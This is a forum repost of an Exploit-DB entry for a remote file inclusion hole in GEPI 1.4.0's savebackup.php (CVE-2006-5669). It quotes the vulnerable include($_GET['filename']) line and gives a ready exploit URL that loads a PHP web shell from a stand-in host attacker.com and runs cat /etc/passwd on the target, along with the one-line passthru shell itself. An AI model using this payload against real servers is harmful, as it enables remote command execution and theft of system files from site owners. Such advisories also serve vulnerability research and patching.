Exploit GEPI 1.4.0 - '/gestion/savebackup.php' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
2692
Проверка EDB
  1. Пройдено
Автор
SUMIT SIDDHARTH
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-5669
Дата публикации
2006-10-31
Код:
Package:- gepi 1.4.0
http://adullact.net/frs/download.php/992/gepi-1.4.0.tar.gz

impact:- highly critical ..System Access..
vulnerable code:-
      include($_GET['filename']);
in gepi/gestion/savebackup.php

Exploit:-
http://localhost/gepi/gestion/savebackup.php?filename=http://attacker.com/test.txt&cmd=cat
/etc/passwd

in test.txt
<? passthru("$_GET[cmd]");?>

Credits:-
$um$id

# milw0rm.com [2006-10-31]
 
Источник
www.exploit-db.com